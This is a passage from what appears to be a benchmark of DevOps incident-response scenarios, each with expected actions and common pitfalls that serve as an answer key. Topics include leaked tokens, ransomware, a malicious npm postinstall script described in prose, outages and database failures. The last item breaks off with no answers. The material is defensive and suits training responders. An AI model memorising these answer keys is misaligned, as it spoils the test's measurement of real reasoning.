- Immediately check RDS automated backups and find the most recent snapshot - Restore the RDS instance from the latest automated snapshot to a new instance - Assess the 18-hour data gap — check binlog or application logs for transactions that can be replayed - Point the application to the restored instance and verify data integrity - Enable deletion protection on the restored instance immediately - Add lifecycle prevent_destroy in the Terraform configuration for all production databases - Require workspace confirmation prompts or use separate state backends per environment - Implement an SCP or IAM policy that denies rds:DeleteDBInstance without MFA on production accounts

Common pitfalls

- Panicking and running terraform apply again, which may create a new empty database - Not checking for automated backups before assuming the data is gone - Restoring to the same instance name while Terraform state is in a conflicted state - Not enabling deletion protection on the restored instance, leaving it vulnerable to the same mistake - Treating the 18-hour-old backup as complete without reconciling the gap

ir-scenario-032 — Security 🔴¶

Your SIEM fires an alert: a GitHub personal access token belonging to a senior engineer was found in a public paste site by an automated secret scanner. The token has repo and admin:org scopes. The token was created 18 months ago and was last used legitimately 6 hours ago. GitHub audit logs show no unusual repository clones or webhook modifications yet, but the paste was posted 45 minutes ago. The engineer is currently offline and unreachable.

Expected actions

- Immediately revoke the exposed GitHub PAT via the organization admin panel - Review GitHub audit logs for any activity from the token in the last hour, especially repo clones, new deploy keys, or webhook changes - Check if the token was used to modify any GitHub Actions workflows that could introduce backdoors - Audit all repositories the token had access to for unauthorized commits or branch protection changes - Rotate any secrets stored in repositories that the token could access - Enable or verify that IP-based access restrictions are in place for the GitHub organization - Create a new token with minimum required scopes when the engineer is back online - File a security incident report and review PAT creation policies (expiration, scope limits)

Common pitfalls

- Waiting for the engineer to come online before revoking — every minute the token is live is exposure - Only checking for repo clones and missing webhook or Actions workflow modifications - Not auditing downstream secrets that the token holder could have accessed - Revoking the token without notifying CI/CD systems that may depend on it, causing a secondary outage

ir-scenario-033 — Security 🔴¶

The security team receives an alert from endpoint detection software on a production jump host. A process is encrypting files in /var/lib/ and appending a .locked extension. CPU utilization on the host has spiked to 100%. The process is running as the deploy user, which has SSH access to 12 other production servers. No ransom note has appeared yet but the pattern matches known ransomware behavior. The jump host serves as the only bastion for production SSH access.

Expected actions

- Immediately isolate the jump host from the network (disable network interface or security group) to prevent lateral movement - Kill the encrypting process and preserve a memory dump for forensic analysis - Revoke or rotate SSH keys for the deploy user on all 12 servers it can reach - Check the 12 downstream servers for signs of compromise or similar encryption activity - Assess the damage on the jump host — identify which files were encrypted and whether backups exist - Establish an alternative SSH access path (temporary bastion or VPN) so production operations can continue - Investigate the initial access vector — how did the attacker get execution as the deploy user - Engage the security incident response team and consider involving law enforcement if confirmed ransomware

Common pitfalls

- Shutting down the host instead of isolating it — this destroys volatile forensic evidence in memory - Focusing only on the jump host while the attacker moves laterally to the 12 other servers - Restoring from backups without understanding the initial access vector, leading to reinfection - Not establishing alternative production access before isolating the bastion, causing an operational lockout

ir-scenario-034 — Security 🟡¶

CloudTrail logs show that an IAM user with AdministratorAccess made 47 API calls from an IP address in a country where your company has no employees or infrastructure. The calls include CreateUser, AttachUserPolicy, and CreateAccessKey. The legitimate user confirms they did not make these calls and last logged in from the office IP 3 days ago. MFA was not enabled on this account.

Expected actions

- Immediately disable the compromised IAM user's access keys and console password - Delete any IAM users, access keys, or policies created by the unauthorized session - Review CloudTrail for the full scope of actions taken — check for Lambda functions, EC2 instances, or S3 bucket policy changes - Check for persistence mechanisms — new IAM roles with trust policies, Lambda backdoors, or EC2 instances in unusual regions - Rotate credentials for any services or resources the compromised user could access - Enable MFA on all IAM users with console access and enforce it via SCP - Investigate how the credentials were compromised (phishing, leaked, credential stuffing) - Review and reduce the scope of AdministratorAccess — apply least privilege

Common pitfalls

- Only disabling the compromised user without checking for newly created persistence accounts - Not checking all AWS regions for resources created by the attacker - Rotating the compromised user's credentials but not the downstream service credentials they could access - Treating this as resolved after cleanup without investigating the initial compromise vector

ir-scenario-035 — Security 🔴¶

Your dependency scanning tool flags that a widely-used internal npm package (@company/auth-utils v2.3.1) was published 6 hours ago by a developer who left the company two weeks ago. The package includes a new postinstall script that curls an external URL and pipes to bash. The package has already been installed by 8 CI pipelines that build production services. The npm registry is self-hosted on Artifactory.

Expected actions

- Immediately unpublish or quarantine the compromised package version from Artifactory - Revoke the departed developer's Artifactory credentials and audit all their recent publish actions - Identify all 8 services that installed the compromised version and assess whether the postinstall script executed - Inspect the external URL payload to understand what the script downloaded and executed - Rebuild all affected services from clean dependencies, pinning to the last known-good version - Rotate all secrets accessible to the 8 CI pipelines (service accounts, deploy keys, environment variables) - Audit Artifactory access controls — implement publishing restrictions requiring active employee status - Check production deployments of the 8 services for indicators of compromise

Common pitfalls

- Assuming the postinstall script did not execute because the build "looked normal" - Unpublishing the package without preserving a copy for forensic analysis - Only rotating CI secrets without checking if the payload exfiltrated secrets to the external URL - Not auditing other packages the departed developer had publish access to

ir-scenario-036 — Security 🟡¶

Your CDN provider reports a volumetric DDoS attack targeting your primary API endpoint. Traffic has spiked from a baseline of 2,000 requests per second to 850,000 requests per second. The attack is a mix of HTTP GET floods and slowloris connections. Your origin servers are responding with increasing latency (p99 jumped from 200ms to 12 seconds). Legitimate users are experiencing timeouts. The attack appears to originate from a botnet spread across 40+ countries.

Expected actions

- Enable CDN-level rate limiting and bot detection rules if not already active - Activate DDoS protection features (e.g., AWS Shield Advanced, Cloudflare Under Attack mode) - Configure origin shield or caching to reduce requests reaching the origin - Identify and block attack patterns — common User-Agent strings, request paths, or header fingerprints - Scale origin infrastructure horizontally if possible to absorb residual traffic - Set up geo-blocking only if the botnet has identifiable geographic concentration and legitimate users are not in those regions - Monitor origin health and implement circuit breakers to prevent cascade failures - Communicate status to affected users via status page and alternative channels

Common pitfalls

- Blocking by country when the botnet spans 40+ countries — this blocks legitimate users without stopping the attack - Scaling origin servers without CDN-level mitigation, which just increases cost without solving the problem - Not distinguishing between attack traffic and legitimate traffic, leading to blocking real users - Waiting for the attack to stop on its own — DDoS attacks can persist for hours or days

ir-scenario-037 — CI/CD 🟡¶

Your CI/CD pipeline has been failing for all teams for the past 30 minutes. The Jenkins controller is running but all build agents show "offline." The agents are running on an auto-scaling group of EC2 instances. CloudWatch shows the ASG scaled to 0 instances 35 minutes ago. The ASG launch template references an AMI that was deregistered yesterday as part of a routine cleanup. No one can deploy, and there is a critical hotfix waiting for production deployment.

Expected actions

- Identify the root cause — the ASG launch template references a deregistered AMI - Update the launch template to point to the current valid AMI - Manually scale up the ASG to restore build agents - For the critical hotfix, consider a manual deployment path while CI recovers - Verify agents come online and reconnect to Jenkins - Implement AMI lifecycle policies that check for active references before deregistering - Add monitoring for ASG desired vs. actual count divergence - Post-incident, add the AMI dependency to the cleanup script's pre-check

Common pitfalls

- Trying to restart Jenkins when the problem is infrastructure, not the controller - Manually launching EC2 instances outside the ASG, creating configuration drift - Deploying the hotfix manually without any CI validation, potentially shipping broken code - Not adding safeguards to prevent the same AMI cleanup issue from recurring

ir-scenario-038 — CI/CD 🔴¶

A deployment to production completed successfully according to the pipeline, but users report that the new version has a critical bug — the payment processing endpoint returns 500 errors for all requests. The deployment used a blue-green strategy with automated health checks. The health check endpoint (GET /health) returns 200 on the new version, but the payment endpoint requires a database migration that was supposed to run as a pre-deploy hook but silently failed. The old database schema is incompatible with the new code.

Expected actions

- Immediately roll back to the previous (blue) version to restore payment processing - Verify that the rollback resolves the 500 errors before doing anything else - Investigate why the database migration pre-deploy hook failed silently - Check the migration logs to understand what went wrong and whether a partial migration occurred - If the migration partially applied, assess whether a rollback migration is needed for the old code to work - Fix the deployment pipeline to fail the deployment if pre-deploy hooks fail - Add deeper health checks that verify critical paths (not just GET /health but POST /payments with a test transaction) - Re-attempt the deployment with the migration fix after thorough staging validation

Common pitfalls

- Running the database migration manually on production without understanding why it failed - Not checking whether a partial migration makes the rollback version also broken - Relying on the same shallow health check that missed the problem in the first place - Pushing a "quick fix" forward instead of rolling back, extending the outage

ir-scenario-039 — CI/CD 🟡¶

Your container registry (Harbor) is returning HTTP 500 errors on all image pull requests. All Kubernetes deployments that attempt to pull new images or restart pods are failing with ImagePullBackOff. Existing running pods are unaffected. Harbor is backed by an S3-compatible object store (MinIO). MinIO dashboard shows one of three nodes is offline with a disk failure. Harbor's garbage collection job started 2 hours ago and is still running.

Expected actions

- Check MinIO cluster health — with one node down, verify whether the cluster has quorum for reads - Stop Harbor's garbage collection job, which may be holding locks or causing excessive I/O on the degraded cluster - Restart Harbor services after stopping GC to clear any cached error states - Replace the failed MinIO disk or node to restore full redundancy - Verify image pulls work after the restart by testing a known-good image - For immediate relief, consider configuring image pull fallback to a mirror registry if one exists - Ensure running deployments have imagePullPolicy set appropriately to avoid unnecessary pulls - Add monitoring for MinIO node health and Harbor GC completion status

Common pitfalls

- Restarting Harbor repeatedly without addressing the underlying MinIO degradation - Not stopping the GC job, which continues stressing the degraded storage backend - Attempting to rebuild or re-push images while the registry is unstable - Ignoring the disk failure as "MinIO handles it" without verifying erasure coding can tolerate the loss

ir-scenario-040 — CI/CD 🟡¶

A rollback was triggered after a canary deployment showed elevated error rates. However, the rollback itself failed — the previous container image tag (v2.8.3) was overwritten in the registry by the current broken build (v2.8.4) due to a tagging pipeline bug that re-tagged the latest image as both v2.8.4 and v2.8.3. Kubernetes is now pulling the broken image for both the "current" and "rollback" versions. Users are experiencing errors and you cannot roll back to a known-good state.

Expected actions

- Check if the original v2.8.3 image digest is still available in the registry (tags are mutable, digests are not) - If the digest exists, update the deployment to reference the image by digest rather than tag - If the digest is garbage-collected, rebuild v2.8.3 from the git tag and push it under a new unique tag - Once a known-good image is running, verify the fix by checking error rates and health endpoints - Fix the tagging pipeline to prevent tag overwrites — use immutable tags or digest-based deployments - Implement registry policies that prevent overwriting existing tags - Add a pre-rollback validation step that verifies the rollback image digest matches expectations - Audit the registry for other images that may have been incorrectly re-tagged

Common pitfalls

- Repeatedly attempting rollback by tag without realizing both tags point to the same broken image - Rebuilding from source without verifying you are building the correct git commit - Not implementing immutable tags, leaving the same vulnerability for future rollbacks - Assuming the registry always preserves old images — garbage collection may have already removed the original layers

ir-scenario-041 — Cloud 🔴¶

Your primary AWS region (us-east-1) is experiencing a major outage affecting EC2, RDS, and ELB services. Your application is deployed in a single region with no cross-region failover. Status page shows the outage is expected to last 2-4 hours. You have RDS automated backups with cross-region replication enabled to us-west-2. Your infrastructure is defined in Terraform but has never been deployed to another region. Customers are completely down.

Expected actions

- Assess the scope — determine which services are affected and whether partial functionality is possible - Communicate to customers with an honest timeline based on AWS status page information - If the outage is expected to be short (under 1 hour), consider waiting rather than attempting a risky cross-region failover - If proceeding with failover, deploy core infrastructure to us-west-2 using Terraform with region-specific variable overrides - Restore RDS from the cross-region replica or latest cross-region backup - Update DNS records to point to the new region's load balancer (ensure TTL is considered) - Verify data consistency after RDS restore — check replication lag at time of outage - Plan and execute failback to us-east-1 once the outage is resolved, reconciling any data written to us-west-2

Common pitfalls

- Attempting an untested cross-region failover under pressure, potentially creating a second outage - Not accounting for region-specific resources (AMI IDs, VPC peering, service endpoints) in the Terraform config - Failing back to us-east-1 without reconciling data written during the failover period - Not updating this incident into a project to implement proper multi-region architecture

ir-scenario-042 — Cloud 🟡¶

The finance team alerts you that this month's AWS bill is $47,000 — three times the normal $15,000 monthly spend. AWS Cost Explorer shows a massive spike starting 10 days ago, concentrated in EC2 and data transfer costs. The EC2 spike is from 200+ m5.4xlarge instances running in ap-southeast-1, a region your team does not use. The instances are tagged with your organization's default tags but were launched by an IAM role used by a CI/CD system.

Expected actions

- Immediately terminate the unauthorized EC2 instances in ap-southeast-1 - Investigate the IAM role — check CloudTrail for who or what assumed the role and launched the instances - Rotate the CI/CD IAM role credentials and review its permissions (likely over-scoped) - Check the instances for what they were doing — crypto mining is the most common reason for unauthorized large instance launches - Implement Service Control Policies (SCPs) to deny EC2 launches in unused regions - Set up AWS Budgets with alerts and auto-actions (e.g., stop instances) when spend exceeds thresholds - Enable AWS Config rules to detect non-compliant resource creation in unauthorized regions - Request a billing adjustment from AWS if the instances were created through compromised credentials

Common pitfalls

- Only terminating the instances without investigating how they were launched — the attacker can relaunch - Not checking all regions — if one region had unauthorized instances, others might too - Assuming the default tags mean the instances are legitimate - Not implementing preventive controls (SCPs, budgets) to stop recurrence

ir-scenario-043 — Cloud 🔴¶

A security scan discovers that an S3 bucket containing customer PII (names, email addresses, phone numbers) has had its bucket policy set to allow public read access. CloudTrail shows the policy was changed 14 days ago by a Terraform apply run by the infrastructure team. The change was in a PR that modified 47 resources, and the bucket policy change was not caught in review. Access logs show 3 unique external IP addresses accessed the bucket over the past 14 days, downloading a total of 2.3 GB of data.

Expected actions

- Immediately restrict the bucket policy to remove public access - Enable S3 Block Public Access at the account level to prevent future public bucket policies - Analyze S3 access logs to identify exactly which objects were downloaded by the 3 external IPs - Assess the scope of the data breach — number of affected customers and types of PII exposed - Engage legal and compliance teams — this likely triggers data breach notification requirements (GDPR, CCPA, etc.) - Notify affected customers as required by applicable regulations - Review and fix the Terraform code that introduced the public policy - Implement automated policy checks in CI (e.g., OPA/Conftest, tfsec) to catch public access in PRs before apply

Common pitfalls

- Treating this as only an infrastructure fix without engaging legal — data breach notification has strict timelines - Assuming the 3 IPs were benign crawlers without investigating what data they accessed - Fixing the Terraform without implementing preventive CI checks, relying on manual review for 47-resource PRs - Not enabling account-level S3 Block Public Access, leaving other buckets vulnerable

ir-scenario-044 — Cloud 🟡¶

An engineer reports they cannot assume their usual IAM role. Investigation reveals that a Terraform apply modified the role's trust policy, replacing the list of trusted principals with a single account ID that does not belong to your organization. The Terraform state file shows the change was made 2 hours ago. Multiple engineers across three teams are locked out of production AWS resources. The IAM role has broad permissions including S3, RDS, and Lambda access.

Expected actions

- Use a break-glass IAM user or root credentials to fix the trust policy immediately - Restore the trust policy to its correct state with the proper principal list - Investigate the Terraform change — review the PR, the person who approved it, and whether the state file was tampered with - Check CloudTrail for any activity from the foreign account ID that assumed the role - Audit all resources the role has access to for unauthorized changes during the 2-hour window - Rotate any secrets or credentials that the role could access - Implement Terraform plan review automation that flags trust policy changes on sensitive roles - Add CloudWatch alarms for IAM trust policy modifications on critical roles

Common pitfalls

- Not having break-glass credentials available, leaving you unable to fix the trust policy - Reverting Terraform without checking whether the foreign account already exploited the access - Only fixing the trust policy without auditing what happened during the 2-hour exposure window - Not investigating whether the Terraform state or code repository was compromised

ir-scenario-045 — Database 🔴¶

Your MySQL replica cluster is showing increasing replication lag — the primary is at binlog position 847392, but two of three replicas are lagging by 45 minutes and growing. The third replica is 3 hours behind and not catching up. Application read queries are returning stale data, and your monitoring shows that the lagging replicas have IO thread running but SQL thread frequently pausing. The primary is processing a large batch job that started 4 hours ago generating heavy write traffic.

Expected actions

- Check the SQL thread on lagging replicas for specific bottlenecks — single-threaded replay of large transactions is the likely cause - Evaluate whether the batch job can be paused or throttled to reduce write pressure on the primary - If using MySQL 5.7+, enable parallel replication (slave_parallel_workers) to speed up replay - For the 3-hour-behind replica, assess whether it is more practical to rebuild from a fresh backup than to wait for catch-up - Route read traffic only to the least-lagging replica or to the primary temporarily - Add monitoring and alerting for replication lag thresholds (warn at 30s, critical at 5min) - Reschedule future batch jobs to off-peak hours with write rate limiting - Investigate if the batch job can be restructured to use smaller transactions

Common pitfalls

- Ignoring the lag because "it will catch up" — if the write rate exceeds replay rate, lag grows forever - Killing the batch job abruptly, potentially leaving data in an inconsistent state - Not routing reads away from lagging replicas, serving stale data to users - Rebuilding all three replicas simultaneously, leaving no read capacity during the rebuild

ir-scenario-046 — Database 🔴¶

A developer reports that query results from the production PostgreSQL database are returning incorrect data — a SUM query on the orders table returns a negative total, which is impossible. Investigation reveals several rows in the orders table have corrupted numeric values. pg_amcheck reports B-tree index corruption on two indexes. The database is running on a server that experienced an unexpected power loss 3 days ago. The database came back up cleanly and no errors were reported until now.

Expected actions

- Immediately take a backup of the current (corrupted) database for forensic analysis - Run a full pg_amcheck and pg_catalog consistency check to determine the full scope of corruption - REINDEX the corrupted indexes to rebuild them from heap data - Verify the heap data itself is not corrupted by comparing known-good records against a recent logical backup - If heap corruption exists, restore from the most recent known-good backup and replay WAL logs up to before the corruption point - Check the storage subsystem for hardware issues — run SMART diagnostics on disks, check RAID controller logs - Verify that full_page_writes is enabled in postgresql.conf (prevents torn page writes after crash) - Implement pg_amcheck in routine maintenance and add UPS or battery-backed write cache to prevent future power-loss corruption

Common pitfalls

- Assuming the database is fine because it started cleanly after the power loss — PostgreSQL recovery does not guarantee zero corruption - REINDEXing without first checking whether the underlying heap data is also corrupt - Restoring a backup without verifying it predates the corruption event - Not checking the hardware — if the disk is failing, the corruption will recur

ir-scenario-047 — Database 🟡¶

Application logs show a sudden spike in database connection errors: "FATAL: remaining connection slots are reserved for non-replication superuser connections." PgBouncer metrics show 500 active server connections (matching PostgreSQL max_connections). The application uses connection pooling via PgBouncer in transaction mode. Investigation shows that a new microservice deployed 2 hours ago opens connections but does not close them properly — it has leaked 300 connections that are in idle state, consuming the pool.

Expected actions

- Identify the leaking microservice's connections using pg_stat_activity (look for idle connections from the specific application_name or client IP) - Terminate the idle leaked connections using pg_terminate_backend() to free up slots - Roll back or fix the leaking microservice deployment - Configure PgBouncer with per-pool or per-user connection limits to prevent any single service from consuming the entire pool - Set idle_in_transaction_session_timeout and idle_session_timeout in PostgreSQL to auto-kill stale connections - Add monitoring for connection pool utilization with alerts at 70% and 90% thresholds - Implement connection leak detection in the microservice's integration tests - Review PgBouncer pool mode — ensure transaction mode is properly releasing connections between queries

Common pitfalls

- Increasing max_connections as a "fix" — this masks the leak and increases memory usage without solving the root cause - Terminating all idle connections indiscriminately, potentially killing legitimate long-running transactions - Not rolling back the leaking microservice, allowing it to re-consume freed connections within minutes - Only fixing the immediate issue without adding pool limits to prevent future monopolization

ir-scenario-048 — Database 🔴¶

Your automated backup system for a 500 GB production PostgreSQL database has been failing silently for 18 days. The alerting was misconfigured and only checked for backup process exit code, not for actual backup file existence or size. The last valid backup is 18 days old. The database has WAL archiving enabled to S3, and WAL files are confirmed present through yesterday. The backup failure is caused by insufficient disk space on the backup server, which filled up from unrotated old backups.

Expected actions

- Immediately free disk space on the backup server by rotating or compressing old backups (after verifying the 18-day-old backup integrity) - Take an immediate pg_basebackup or pgBackRest backup to establish a fresh baseline - Verify the backup by restoring it to a standby server — a backup you have not tested is not a backup - Verify WAL archive continuity from the 18-day-old backup through present — ensure no gaps exist - Fix the backup monitoring to verify backup file existence, size, and age — not just process exit code - Implement backup rotation policies to prevent disk space exhaustion - Add a "last successful backup age" metric with alerting if it exceeds 24 hours - Consider switching to pgBackRest with built-in retention management and verification

Common pitfalls

- Deleting old backups to make space without first verifying the 18-day-old backup is restorable - Assuming WAL archiving covers the gap — WAL replay requires a base backup as a starting point - Fixing the disk space issue without fixing the monitoring that let 18 days pass unnoticed - Not testing the emergency backup by restoring it — you need to confirm it works before you can relax

ir-scenario-049 — Observability 🟡¶

Your Prometheus server restarted due to an OOM kill 20 minutes ago. After restart, it has a gap in all metrics from the last 2 hours because WAL replay failed and was skipped. Alertmanager did not fire during the gap because there was no data to evaluate rules against. Your team only discovered the gap when an engineer noticed the Grafana dashboards showed "No Data" for the period. During the blind spot, an application had elevated error rates that went undetected for 45 minutes.

Expected actions

- Verify Prometheus is now scraping correctly and alerts are evaluating again - Manually check key application metrics and logs for the 2-hour blind spot period - Investigate the application error rate issue that was missed and ensure it is now resolved - Diagnose why Prometheus OOM'd — check cardinality explosion, expensive queries, or insufficient memory allocation - Increase Prometheus memory limits and configure memory-based backpressure (e.g., storage.tsdb.max-block-duration) - Implement a "dead man's switch" alert — an alert that fires when Prometheus itself stops reporting - Add a Prometheus meta-monitoring layer (e.g., a lightweight agent that pings Prometheus health endpoint) - Consider enabling WAL-based remote write to a secondary store for redundancy during gaps

Common pitfalls

- Assuming the Prometheus restart means everything is fine without checking what happened during the blind spot - Not implementing dead man's switch alerting — the same gap will be invisible next time - Only increasing memory without investigating the root cause of the OOM (cardinality, expensive queries) - Not verifying that WAL replay works correctly after fixing the memory issue

ir-scenario-050 — Observability 🔴¶

Alertmanager is sending 2,000+ alerts per hour, overwhelming the on-call engineer's phone with notifications. The alert storm was triggered by a single network switch failure that caused 30 servers to become unreachable, firing alerts for every service, every check, and every dependent system on those servers. The actual incident (switch failure) is being drowned out by thousands of symptom alerts. The on-call engineer has muted their phone and is now missing alerts from unrelated production systems.

Expected actions

- Silence the symptom alerts related to the 30 unreachable servers using Alertmanager silence rules (match by server label or network segment) - Identify and focus on the root cause alert — the network switch failure - Engage the network team to replace or failover the switch - Verify that silencing only affects the known-impacted servers and does not mask unrelated issues - After the switch is restored, remove the silences and verify all services recover - Implement alert dependency/inhibition rules — if a node is unreachable, suppress all service-level alerts for that node - Add alert aggregation — group alerts by infrastructure segment rather than sending individual alerts - Review alert routing to ensure critical root-cause alerts are prioritized over symptom alerts

Common pitfalls

- Muting all alerts to stop the noise, which also silences unrelated critical alerts - Not implementing inhibition rules, guaranteeing the same alert storm on the next infrastructure failure - Trying to acknowledge or resolve each of the 2,000 alerts individually - Not silencing precisely enough, either too broad (missing real alerts) or too narrow (still noisy)

ir-scenario-051 — Observability 🟡¶

Your centralized logging pipeline (Filebeat -> Kafka -> Logstash -> Elasticsearch) has stopped ingesting new logs. Kibana shows the most recent log is 4 hours old. Kafka consumer group lag is growing rapidly (currently 50 million messages behind). Logstash is running but its pipeline throughput is zero. Elasticsearch cluster health is red — one data node ran out of disk space and the cluster has unassigned shards blocking writes to the affected indices.

Expected actions

- Free disk space on the Elasticsearch data node — delete old indices, increase disk, or move shards - Clear the Elasticsearch flood-stage watermark block on affected indices - Verify cluster health returns to green/yellow and index writes resume - Monitor Logstash throughput to confirm it starts processing the Kafka backlog - Assess Kafka consumer lag — ensure consumer throughput exceeds producer rate so lag decreases - Scale Logstash horizontally if the backlog is too large to drain before Kafka retention expires - Implement ILM (Index Lifecycle Management) policies to auto-roll and delete old indices - Add alerts for Elasticsearch disk usage at 70% (warn) and 85% (critical) to prevent recurrence

Common pitfalls

- Restarting Logstash repeatedly when the problem is Elasticsearch rejecting writes - Not clearing the flood-stage watermark after freeing space — Elasticsearch does not auto-resume - Letting the Kafka backlog exceed retention, permanently losing logs for the gap period - Only adding disk without implementing index lifecycle management, deferring the problem

ir-scenario-052 — Observability 🔴¶

Your Prometheus instance is consuming 45 GB of memory and growing, up from 8 GB a week ago. Query performance has degraded severely. Investigation reveals that a new service deployed 5 days ago exports a metric with a label containing user IDs, creating millions of unique time series (cardinality explosion). The metric is user_request_duration with labels {method, path, user_id, status}. The user_id label alone has created 2.3 million active time series.

Expected actions

- Identify the offending metric and label using Prometheus TSDB stats or promtool - Contact the service team and have them remove the user_id label from the metric immediately - Drop the high-cardinality metric at ingestion using Prometheus relabeling rules as an emergency measure - Delete the existing high-cardinality time series data using TSDB admin API to reclaim memory - Restart Prometheus if memory does not recover after series deletion - Implement cardinality limits — use Prometheus metric_relabel_configs or a proxy like Grafana Agent with series limiting - Add a pre-deploy check or CI rule that rejects metrics with unbounded label values - Educate the team on metric design — use histograms for user-level latency, not labels

Common pitfalls

- Only removing the label going forward without deleting existing series — memory stays high - Not implementing cardinality limits, leaving the system vulnerable to the next team that adds a high-cardinality label - Increasing Prometheus memory as a "fix" — this delays the OOM but does not solve the exponential growth - Blocking the metric entirely without providing an alternative way for the team to track user-level latency

ir-scenario-053 — Networking 🔴¶

Multiple customers report they cannot reach your application. Internal monitoring from within the cloud provider shows the application is healthy. External uptime monitors from multiple geographic locations confirm the application is unreachable. dig queries against public DNS resolvers return SERVFAIL for your domain. Your DNS is hosted on a managed DNS provider (separate from your cloud hosting). The DNS provider's status page shows "investigating elevated error rates."

Expected actions

- Confirm the DNS provider outage is the root cause by querying your authoritative nameservers directly - Check if any secondary/backup nameservers are functioning and can serve queries - Communicate to customers via channels that do not depend on your domain (social media, status page if hosted elsewhere, direct email) - If the outage persists beyond the DNS provider's estimated fix time, prepare to migrate DNS to a backup provider - Lower TTLs on records (once DNS is accessible again) to enable faster failover in the future - Consider implementing DNS redundancy with a secondary DNS provider (multi-provider DNS) - Verify all DNS records are correct once the provider recovers - Post-incident, evaluate multi-provider DNS or self-hosted secondary nameservers for critical domains

Common pitfalls

- Assuming the problem is with your application and wasting time investigating application health - Trying to update DNS records during the provider outage — the management API is likely also affected - Not having DNS records documented outside the provider, making migration under pressure error-prone - Relying on a status page hosted on the same domain that is unreachable

ir-scenario-054 — Networking 🟡¶

Users are reporting HTTPS certificate errors when accessing your application. The error is "NET::ERR_CERT_DATE_INVALID." Investigation shows that the TLS certificate for your primary domain expired 6 hours ago. Your certificate was managed by Let's Encrypt with automatic renewal via cert-manager in Kubernetes. The cert-manager logs show renewal failures for the past 30 days — the ACME HTTP-01 challenge has been failing because a recent ingress configuration change broke the challenge path routing.

Expected actions

- Issue an emergency certificate — manually run certbot or use the cert-manager CLI to force renewal - Fix the ingress configuration that broke the ACME challenge path (ensure /.well-known/acme-challenge/ routes correctly) - If manual renewal fails, temporarily use a self-signed or purchased certificate while debugging - Verify the new certificate is deployed and users can connect without errors - Investigate why 30 days of cert-manager renewal failures went unnoticed - Add monitoring for certificate expiry — alert at 30, 14, and 7 days before expiration - Add monitoring for cert-manager renewal success/failure events - Test the renewal process end-to-end in a staging environment after fixing the ingress

Common pitfalls

- Not fixing the ingress routing, causing the emergency certificate to also fail renewal in 90 days - Using a self-signed certificate as a permanent fix — browsers will still show warnings - Not investigating why 30 days of failures went unalerted — the monitoring gap is the deeper issue - Rushing the ingress fix without testing in staging, potentially breaking other routes

ir-scenario-055 — Networking 🔴¶

Your NOC detects that traffic from certain ISPs in Southeast Asia is being routed through an unexpected AS (autonomous system) that does not belong to your hosting provider. BGP monitoring tools show an unauthorized BGP announcement for your /24 prefix from an unknown ASN. Affected users are experiencing intermittent connectivity issues and packet loss. The unauthorized route is more specific than your provider's announcement, so some networks prefer the hijacked route.

Expected actions

- Contact your upstream ISP/hosting provider immediately to announce more-specific prefixes to combat the hijack - Report the BGP hijack to the offending ASN's abuse contact and their upstream providers - Register your prefix in appropriate IRR (Internet Routing Registry) databases if not already done - Implement RPKI (Resource Public Key Infrastructure) ROAs for your prefixes to enable route origin validation - Monitor BGP looking glasses and route collectors (RIPE RIS, RouteViews) to track the hijack's propagation - Communicate with affected users about potential traffic interception and recommend VPN usage temporarily - Work with your ISP to implement BGP route filtering based on IRR/RPKI - Post-incident, evaluate BGP monitoring services for continuous prefix monitoring

Common pitfalls

- Assuming this is a transient routing issue and waiting for it to resolve — BGP hijacks may be intentional - Not considering that intercepted traffic may have been captured (MITM) — this is a potential data breach - Only contacting the offending ASN without also working with your own upstream to announce countermeasures - Not implementing RPKI, leaving your prefixes vulnerable to future hijacks

ir-scenario-056 — Networking 🟡¶

Users on a specific internal network segment report that large file uploads and certain API responses are failing with connection resets. Small requests work fine. Investigation shows the issue started after a network team change to enable jumbo frames (MTU 9000) on the core switches. The path between the application servers and the users crosses a VPN tunnel that has an MTU of 1400. Path MTU Discovery is being blocked because the intermediate firewall drops ICMP "Fragmentation Needed" packets.

Expected actions

- Identify the MTU mismatch — jumbo frames (9000) on the core, 1400 on the VPN tunnel - Configure the firewall to allow ICMP type 3 code 4 (Fragmentation Needed/Packet Too Big) messages - As an immediate workaround, lower the MSS clamping on the VPN endpoints to 1360 (1400 - 40 bytes overhead) - Verify large transfers work after the fix by testing with specific payload sizes - If ICMP cannot be unblocked quickly, set the server-side MTU or MSS to accommodate the smallest path MTU - Document the network path MTUs and establish a policy for MTU changes that includes path validation - Add monitoring for TCP retransmission rates on the affected network segment - Test the jumbo frame change end-to-end across all network paths before re-enabling on the core

Common pitfalls

- Reverting the jumbo frames change entirely instead of fixing the actual ICMP filtering issue - Not testing all network paths — the VPN tunnel is one bottleneck but there may be others - Blaming the application for connection resets without investigating the network layer - Blocking all ICMP at the firewall "for security" without understanding that PMTUD depends on it

ir-scenario-057 — Kubernetes 🔴¶

A container image vulnerability scan reveals that your production workload is running an nginx base image with a critical CVE that allows remote code execution. The image is deployed across 15 services in production. The vulnerable nginx version is 1.21.3 and the fix requires upgrading to 1.21.7+. The services use a shared base image from your internal registry that has not been updated in 8 months. Three of the 15 services have not been deployed in 6 months and their CI pipelines are broken.

Expected actions

- Assess exploitation risk — is nginx directly exposed or behind a WAF/reverse proxy that may mitigate the CVE - Update the shared base image to use the patched nginx version and push to the internal registry - Rebuild and redeploy the 12 services with working CI pipelines using the updated base image - For the 3 services with broken pipelines, fix the pipelines or manually build and deploy updated images - Implement a WAF rule to mitigate the CVE for services that cannot be immediately patched - Set up automated base image scanning and rebuild triggers when critical CVEs are published - Establish a policy that base images must be rebuilt at least monthly - Audit all other base images in the registry for similar staleness issues

Common pitfalls

- Patching only the directly exposed services while leaving 12 others vulnerable on internal networks - Ignoring the 3 services with broken pipelines because they are "too hard to fix right now" - Updating the base image without testing that the nginx upgrade does not break application configs - Not implementing automated scanning and rebuild policies, leading to the same 8-month staleness again

ir-scenario-058 — Kubernetes 🔴¶

Your Kubernetes cluster's etcd cluster has lost quorum. Two of three etcd members are reporting "cluster ID mismatch" errors after a failed etcd upgrade attempt. The Kubernetes API server is returning "etcdserver: leader changed" errors and then becomes completely unresponsive. Existing pods continue to run but no new scheduling, scaling, or deployments are possible. Kubectl commands timeout. The etcd data directory is on local SSDs with no recent snapshot.

Expected actions

